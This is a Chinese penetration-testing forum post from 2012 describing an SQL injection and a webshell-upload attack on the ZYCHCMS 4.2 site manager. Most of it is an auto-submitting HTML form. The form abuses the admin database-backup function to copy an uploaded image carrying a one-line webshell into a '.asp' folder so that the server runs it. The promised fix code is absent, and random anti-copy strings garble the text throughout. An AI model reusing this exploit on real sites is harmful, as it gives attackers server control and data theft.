中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]
作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
: B# d$ R! d5 [( H6 @# d
3 v9 d! |( M4 i/ H$ }

9 j# v; Z7 F0 A# e" n7 w9 {
: h' p% s" Q5 T- i, X2 x+ Z7 G$ H影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)- z. f- R# i. @( n
①SQL注射漏洞
- S" b  x4 C2 B6 Z) e7 Y 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
8 [) t4 s7 g. S 漏洞原因:未过滤- l  J' o& X- N" }0 M* p1 H8 I
漏洞代码:
+ k! `8 @4 c" ~& }- S+ B 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。( a! `; i/ X5 [, x% F9 L
修复方法:在文件开头加入代码
& ~& V- }! H% O ' K8 A# ]' P" o* Z
  s  b+ O+ F% M' @# Q' M& L6 D; O
②后台拿WBSHELL
1 z$ u: [6 I5 S7 h# w 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 ~/ ^3 |* L8 T1 y! a- j 这里在网上找了一个,改了下,将就着用。
: k9 z0 s3 r  s: U7 A 以下是代码本地提交代码8 r& N. E( O; H2 }

/ ^9 u" A& N) p( n; I  G2 V. E; n3 d8 o. }4 W: S
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>* z# l, u7 K) A- d9 R
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>1 a. ]7 [3 L( o
<tr>- R* {& h3 x& A: x& ?
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
2 j4 s' F5 J" ^; d </tr># q+ o# U. e2 u1 p* O0 r
<tr>& @& _1 B; k( B: B
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
* A3 n2 V1 p' Z: Y </span>/ w# U2 r% V* A& t2 Q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
9 s+ x! D: w6 I <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
* j3 g* S) \. h0 ] <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>" U& J' Z4 t# Q+ C% `
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
! [5 N. q6 h* w <div align=”left”>- j' Y  [9 ?% _
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
0 F+ |: y( x/ b1 w5 ? <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
; ?1 G% x5 e5 ], t4 T' T) a <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
) ^( ]+ A4 H, t2 K  [) z </div></td>
% g$ m5 J$ k+ N0 x </tr>
+ K+ z  L/ s- q' S5 j <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
* E) I0 q5 @0 g' l4 A <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td># T& M: X; l" _# ?2 K: m- U
<td class=”td”><div align=”left”>
6 |# J- x5 L5 t% P4 d% r, _ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />$ @; N5 P5 A8 L+ M
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) b& A/ U& u% w2 F# B9 I) |, G" Q/ l# O </tr>
8 h( F' r1 K" H6 g6 K3 P <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>+ J/ ^* `5 x, E* V  x! p
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>. u$ u2 ^0 b( z( ?- D6 b: s, P2 n% {' o
<td class=”td”><div align=”left”>
6 Q, ]+ t$ j; y/ D <input type=”submit” value=”确定备份” class=”btn”# {$ |- J6 N* \' `/ y4 |
</div></td>5 `( Z& b0 u6 _  M8 K0 y
</tr>
9 y$ x: i1 o5 e0 H8 M( B/ q* O3 G/ G </table></td></tr></form>
5 [* c' @. F1 a: q/ w4 y" a! D1 @ </table># o, U7 Q4 W8 I* Y) ?5 F6 [
</td>
9 V8 m& E5 y/ Q& E </tr>
; L* r/ X7 ], ?# U/ y& d3 u( X </table>) x5 e, W6 A8 v7 [$ x" k; {" j
<script>
) Z" \" o. W+ |; H' \ document.all.add.submit();4 }- U0 t$ _9 [9 I
</script>% c/ e. x" r4 T9 @7 _7 Z$ D1 D" w

& D7 d7 J# w' h& B8 g2 c0 x6 p! f4 j* k5 q

" q/ N# d& j! w7 B, J
, h8 z+ l0 t" w2 F$ ^. C2 I7 E, M8 i" @; F

, @9 h) x( w0 _' w
6 Y: V2 `( Y' t! h! Z; m  a9 s' W7 V  u: K" y

" q/ V: q  i9 }( l1 [. O  H% ?3 u2 G& {* @




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2